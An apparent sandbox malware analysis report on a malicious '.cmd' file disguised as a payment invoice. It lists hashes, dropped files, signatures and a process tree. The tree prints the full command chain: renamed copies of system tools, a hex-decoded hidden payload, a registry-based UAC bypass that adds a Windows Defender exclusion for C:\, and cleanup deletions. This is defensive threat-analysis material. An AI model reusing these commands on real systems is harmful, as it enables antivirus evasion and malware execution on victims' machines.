Analysis
max time kernel: 142s
max time network: 120s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 07-06-2024 05:19

Static task: static1

Behavioral task: behavioral1
Sample: INV200495000-PAY ORDER0940584.cmd
Resource: win7-20240221-en

Behavioral task: behavioral2
Sample: INV200495000-PAY ORDER0940584.cmd
Resource: win10v2004-20240508-en
General
Target: INV200495000-PAY ORDER0940584.cmd
Size: 3.0MB
MD5: ba6011bbbcee0c141db0c45b8219a275
SHA1: e8fe383f4b6614b70fe9902618660aad3199bb62
SHA256: a7d331358f0530d1b5780f18ded9587256f16a675b1f440ebb73c92979d9719b
SHA512: 3b1145ff9512fc0d7e3dcbae431cd3424e12721c17a4be043ca2b4ddd7ab4db5f9670ea07e75eedfad8d928b9fe08ca2412d062375b1df25e9ed31aa25fdfadf
SSDEEP: 49152:MmZIVekHAYmaBfa2cLySXFDvh13zo//zhK6x3UGZJyFxCknVgGlL1+I0bHdFE4Kh:7
Malware Config
Signatures
-
Executes dropped EXE 24 IoCs
Processes (pid, process):
1800 alpha.exe
2216 alpha.exe
1764 alpha.exe
2004 alpha.exe
2636 kn.exe
2716 alpha.exe
2540 alpha.exe
2596 alpha.exe
2624 alpha.exe
3036 xkn.exe
2960 alpha.exe
3012 ger.exe
1768 alpha.exe
2796 kn.exe
2828 alpha.exe
2032 Ping_c.pif
336 alpha.exe
784 alpha.exe
780 alpha.exe
888 alpha.exe
2420 alpha.exe
2708 alpha.exe
2020 alpha.exe
1092 alpha.exe
Loads dropped DLL 15 IoCs
Processes (pid, process):
3028 cmd.exe
3028 cmd.exe
3028 cmd.exe
3028 cmd.exe
2004 alpha.exe
3028 cmd.exe
3028 cmd.exe
3028 cmd.exe
3028 cmd.exe
2624 alpha.exe
3036 xkn.exe
3036 xkn.exe
2960 alpha.exe
1240 WerFault.exe
1240 WerFault.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes (pid, pid_target, process, target process):
1240 2032 WerFault.exe Ping_c.pif
Kills process with taskkill 1 IoCs
Processes (pid, process):
2948 taskkill.exe
Modifies registry class 5 IoCs
Processes (description, ioc, process):
Key created: \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell (ger.exe)
Key created: \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open (ger.exe)
Set value (str): \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" (ger.exe)
Key created: \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command (ger.exe)
Key created: \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings (ger.exe)
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes (pid, process):
2032 Ping_c.pif
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes (pid, process):
3036 xkn.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes (description, pid, process):
Token: SeDebugPrivilege 3036 xkn.exe
Token: SeDebugPrivilege 2948 taskkill.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes (pid wrote to memory of target pid, process -> target process; identical consecutive entries are collapsed with their count, 64 entries in total):
PID 3028 wrote to memory of 2516  cmd.exe -> extrac32.exe  (3 entries)
PID 3028 wrote to memory of 1800  cmd.exe -> alpha.exe  (3 entries)
PID 3028 wrote to memory of 2216  cmd.exe -> alpha.exe  (3 entries)
PID 3028 wrote to memory of 1764  cmd.exe -> alpha.exe  (3 entries)
PID 1764 wrote to memory of 2052  alpha.exe -> extrac32.exe  (3 entries)
PID 3028 wrote to memory of 2004  cmd.exe -> alpha.exe  (3 entries)
PID 2004 wrote to memory of 2636  alpha.exe -> kn.exe  (3 entries)
PID 3028 wrote to memory of 2716  cmd.exe -> alpha.exe  (3 entries)
PID 2716 wrote to memory of 2592  alpha.exe -> extrac32.exe  (3 entries)
PID 3028 wrote to memory of 2540  cmd.exe -> alpha.exe  (3 entries)
PID 2540 wrote to memory of 2272  alpha.exe -> extrac32.exe  (3 entries)
PID 3028 wrote to memory of 2596  cmd.exe -> alpha.exe  (3 entries)
PID 2596 wrote to memory of 2236  alpha.exe -> extrac32.exe  (3 entries)
PID 3028 wrote to memory of 2624  cmd.exe -> alpha.exe  (3 entries)
PID 2624 wrote to memory of 3036  alpha.exe -> xkn.exe  (3 entries)
PID 3036 wrote to memory of 2960  xkn.exe -> alpha.exe  (3 entries)
PID 2960 wrote to memory of 3012  alpha.exe -> ger.exe  (3 entries)
PID 3028 wrote to memory of 1768  cmd.exe -> alpha.exe  (3 entries)
PID 1768 wrote to memory of 2796  alpha.exe -> kn.exe  (3 entries)
PID 3028 wrote to memory of 2828  cmd.exe -> alpha.exe  (3 entries)
PID 2828 wrote to memory of 2948  alpha.exe -> taskkill.exe  (3 entries)
PID 3028 wrote to memory of 2032  cmd.exe -> Ping_c.pif  (1 entry)
Processes (process tree; the bracketed number is the depth in the tree, followed by the image path, the command line, and the signatures that fired for that process)

[1] C:\Windows\system32\cmd.exe
    command: cmd /c "C:\Users\Admin\AppData\Local\Temp\INV200495000-PAY ORDER0940584.cmd"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\extrac32.exe
      command: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"

  [2] C:\Users\Public\alpha.exe
      command: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
      - Executes dropped EXE

  [2] C:\Users\Public\alpha.exe
      command: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
      - Executes dropped EXE

  [2] C:\Users\Public\alpha.exe
      command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\extrac32.exe
        command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

  [2] C:\Users\Public\alpha.exe
      command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\INV200495000-PAY ORDER0940584.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

    [3] C:\Users\Public\kn.exe
        command: C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\INV200495000-PAY ORDER0940584.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
        - Executes dropped EXE

  [2] C:\Users\Public\alpha.exe
      command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\extrac32.exe
        command: extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"

  [2] C:\Users\Public\alpha.exe
      command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\extrac32.exe
        command: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"

  [2] C:\Users\Public\alpha.exe
      command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\extrac32.exe
        command: extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"

  [2] C:\Users\Public\alpha.exe
      command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

    [3] C:\Users\Public\xkn.exe
        command: C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

      [4] C:\Users\Public\alpha.exe
          command: "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious use of WriteProcessMemory

        [5] C:\Users\Public\ger.exe
            command: C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
            - Executes dropped EXE
            - Modifies registry class

  [2] C:\Users\Public\alpha.exe
      command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

    [3] C:\Users\Public\kn.exe
        command: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
        - Executes dropped EXE

  [2] C:\Users\Public\alpha.exe
      command: C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\taskkill.exe
        command: taskkill /F /IM SystemSettings.exe
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken

  [2] C:\Users\Public\Libraries\Ping_c.pif
      command: C:\Users\Public\Libraries\Ping_c.pif
      - Executes dropped EXE
      - Suspicious behavior: CmdExeWriteProcessMemorySpam

    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 692
        - Loads dropped DLL
        - Program crash

  [2] C:\Users\Public\alpha.exe
      command: C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
      - Executes dropped EXE

  [2] C:\Users\Public\alpha.exe
      command: C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
      - Executes dropped EXE

  [2] C:\Users\Public\alpha.exe
      command: C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
      - Executes dropped EXE

  [2] C:\Users\Public\alpha.exe
      command: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
      - Executes dropped EXE

  [2] C:\Users\Public\alpha.exe
      command: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
      - Executes dropped EXE

  [2] C:\Users\Public\alpha.exe
      command: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
      - Executes dropped EXE

  [2] C:\Users\Public\alpha.exe
      command: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
      - Executes dropped EXE

  [2] C:\Users\Public\alpha.exe
      command: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
      - Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

C:\Users\Public\Libraries\Ping_c.pif
  Filesize: 1.1MB
  MD5: cf0406a9f208a43a3a3eccf1769f55d5
  SHA1: 7a8d7bde7f7ffacbda4847f354d62e311312f071
  SHA256: 8bd6792495e882b3f5604fc9cf7fdc1357d38c5297593951bb26aa9309765df8
  SHA512: ae35345f9a0d00de0f147056ad8f8c700eca6860ac869c28f6b71ef70f71bee96f8efeb5e2d7d8a75eee2aafeac34124ff5acc947c608478ee478332d9130b00

C:\Users\Public\Ping_c.mp4
  Filesize: 2.2MB
  MD5: d7e89c5831e8bcb061122aa646bf5815
  SHA1: d98375cc44cdb2662fafc4db36674833347a7ef7
  SHA256: f6ed12b8c9298e89a282c473e2022c477116da4aee339e27569eb15368bf2076
  SHA512: b497f8971be6958f0868d9c9ea68ade02e1ff18506360af5eda2ba87ac32a510fdb7dfd41701b1d894ec5901232fc3abe74ab2ff5fb0ba821936dde1b6914054

C:\Users\Public\ger.exe
  Filesize: 73KB
  MD5: 9d0b3066fe3d1fd345e86bc7bcced9e4
  SHA1: e05984a6671fcfecbc465e613d72d42bda35fd90
  SHA256: 4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e
  SHA512: d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119

C:\Users\Public\kn.exe
  Filesize: 1.1MB
  MD5: ec1fd3050dbc40ec7e87ab99c7ca0b03
  SHA1: ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
  SHA256: 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
  SHA512: 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

\Users\Public\alpha.exe
  Filesize: 337KB
  MD5: 5746bd7e255dd6a8afa06f7c42c1ba41
  SHA1: 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8
  SHA256: db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
  SHA512: 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

\Users\Public\xkn.exe
  Filesize: 462KB
  MD5: 852d67a27e454bd389fa7f02a8cbe23f
  SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
  SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
  SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

memory/2032-71-0x0000000000400000-0x0000000000522000-memory.dmp
  Filesize: 1.1MB

memory/3036-43-0x000000001B420000-0x000000001B702000-memory.dmp
  Filesize: 2.9MB

memory/3036-44-0x0000000001EA0000-0x0000000001EA8000-memory.dmp
  Filesize: 32KB